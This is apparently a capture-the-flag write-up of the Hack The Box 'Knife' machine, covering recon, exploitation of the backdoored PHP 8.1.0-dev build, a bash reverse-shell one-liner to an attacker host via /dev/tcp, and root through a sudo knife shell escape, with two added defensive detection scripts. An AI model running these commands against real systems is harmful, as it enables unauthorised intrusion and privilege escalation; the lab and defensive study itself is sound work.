HTB Knife

$ nmap 10.10.10.242

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 09:57 EDT
Nmap scan report for 10.10.10.242
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

$ nmap 10.10.10.242 -p- -v

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 09:58 EDT
Initiating Ping Scan at 09:58
Scanning 10.10.10.242 [2 ports]
Completed Ping Scan at 09:58, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:58
Completed Parallel DNS resolution of 1 host. at 09:58, 0.03s elapsed
Initiating Connect Scan at 09:58
Scanning 10.10.10.242 [65535 ports]
Discovered open port 22/tcp on 10.10.10.242
Discovered open port 80/tcp on 10.10.10.242
Completed Connect Scan at 09:58, 28.55s elapsed (65535 total ports)
Nmap scan report for 10.10.10.242
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.72 seconds

http://10.10.10.242/

$ whatweb 10.10.10.242

http://10.10.10.242 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

$ searchsploit php 8.1.0-dev

-------------------------------------------------------------------------------- | ---------------------
Exploit Title                                                                    | Path
-------------------------------------------------------------------------------- | ---------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration                          | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script)                | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                   | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                               | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection                                             | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities                      | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit)                       | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal                               | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities      | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution                                         | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities                  | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit) | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities                         | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting                                         | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                              | php/webapps/49933.py
Plesk < 9.5.4 - Remote Command Execution                                         | php/remote/25986.txt
REDCap < 9.1.2 - Cross-Site Scripting                                            | php/webapps/47146.txt
Responsive FileManager < 9.13.4 - Directory Traversal                            | php/webapps/45271.txt
Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure                      | php/webapps/41272.txt
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities                | php/webapps/46666.txt
Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)            | php/remote/28407.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities              | php/webapps/39553.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting     | php/webapps/46815.txt
-------------------------------------------------------------------------------- | ---------------------
Shellcodes: No Results

$ searchsploit -m php/webapps/49933.py

  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators

Copied to: /home/kali/htb/knife/49933.py

$ python3 49933.py

Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/ 
Can't acces tty; job crontol turned off.
$

$ id

uid=1000(james) gid=1000(james) groups=1000(james)

This exploit gives us a shell, but it is a limited one and not very useful; we can try to get a better one. The backdoor itself is described here:
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
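From the defender's side, the two things worth alerting on here are both visible in the recon output above: the server advertising the backdoored dev build in X-Powered-By, and any request carrying the misspelt User-Agentt header the exploit title refers to. The following is an added example (not part of this writeup or of the exploit scripts) that checks captured HTTP messages for those two indicators; the sample messages are constructed, and the response mirrors the whatweb banner from this box.

```python
"""Added example (not part of the original writeup): flag HTTP messages that
match the PHP 8.1.0-dev backdoor fingerprint shown on this box. Indicators
come from the page: the server banner 'X-Powered-By: PHP/8.1.0-dev' and a
request carrying a 'User-Agentt' header (the trigger header named in the
exploit title). The sample messages are constructed for this demo."""
from typing import Dict, List, Tuple

BACKDOORED_BUILD = "PHP/8.1.0-dev"
TRIGGER_HEADER = "user-agentt"  # compared case-insensitively


def parse_http(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return (start line, headers) for a raw HTTP message; header names are
    lower-cased, the body is ignored and malformed header lines are skipped."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def findings(raw: str) -> List[str]:
    """Tags for each indicator present: 'backdoored-build' on a response that
    advertises the dev build, 'trigger-header' on a request using User-Agentt."""
    _, headers = parse_http(raw)
    tags: List[str] = []
    if headers.get("x-powered-by", "").startswith(BACKDOORED_BUILD):
        tags.append("backdoored-build")
    if TRIGGER_HEADER in headers:
        tags.append("trigger-header")
    return tags


# Constructed samples; the response mirrors the whatweb banner from this box.
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>")
SAMPLE_REQUEST = ("GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: curl/7.74.0\r\n"
                  "User-Agentt: <placeholder>\r\n\r\n")
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    for msg in (SAMPLE_RESPONSE, SAMPLE_REQUEST, BENIGN_REQUEST):
        print(parse_http(msg)[0], "->", findings(msg) or "clean")
```

Note that Apache's default combined log format records User-Agent but not arbitrary extra headers, so the request-side check needs full headers from a proxy, WAF or packet capture rather than access.log.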

$ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'"
$ sudo nc -lvnp 4444

[sudo] password for kali: 
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 46136
bash: cannot set terminal process group (959): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ 

james@knife:/$ ls

ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var

james@knife:/$ cd /home
james@knife:/home$ ls

ls
james

james@knife:/home$ cd james
james@knife:~$ ls

ls
user.txt

james@knife:~$ cat user.txt

1a6aXXXXXXXXXXXXXXXXXXXXXXXXXXXX

james@knife:~$ sudo -l

sudo -l 
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

https://gtfobins.github.io/gtfobins/knife/
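The sudo rule above is the whole privilege-escalation path: a NOPASSWD entry for a binary that can spawn a shell. As an added example (not part of this writeup), here is a small audit that parses `sudo -l` output and flags NOPASSWD entries whose binary is on a watch list of known shell-escape programs; the sample text is the page's own sudo -l output, and the watch list (just knife here) is an assumption to be extended from GTFOBins.

```python
"""Added example (not from the writeup): audit `sudo -l` output for NOPASSWD
entries whose binary is a known shell-escape. The sample is the page's own
sudo -l output; the watch list is an assumption (extend it from GTFOBins)."""
import os
import re
from typing import List, Tuple

SHELL_ESCAPE_BINARIES = {"knife"}  # assumption: the one binary listed on this box

# One sudoers entry as printed by `sudo -l`: "(runas) TAG: TAG: /path/cmd, /path/cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> List[Tuple[str, List[str], str]]:
    """Return (runas, tags, command) for each entry after the 'may run' line."""
    entries: List[Tuple[str, List[str], str]] = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))]
        for cmd in re.split(r",\s*", m.group("cmd")):
            entries.append((m.group("runas"), tags, cmd))
    return entries


def risky_entries(text: str) -> List[Tuple[str, str]]:
    """NOPASSWD entries whose binary can spawn a shell, as (runas, command)."""
    out = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = os.path.basename(cmd.split()[0])
        if "NOPASSWD" in tags and binary in SHELL_ESCAPE_BINARIES:
            out.append((runas, cmd))
    return out


# Sample: the sudo -l output from this box (backslashes kept via a raw string).
SAMPLE = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for runas, cmd in risky_entries(SAMPLE):
        print(f"shell-escape binary runnable as {runas} without password: {cmd}")
```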

james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh -i"'

sudo /usr/bin/knife exec -E 'exec "/bin/sh -i"'
/bin/sh: 0: can't access tty; job control turned off
#

# id

uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt

8874XXXXXXXXXXXXXXXXXXXXXXXXXXXX
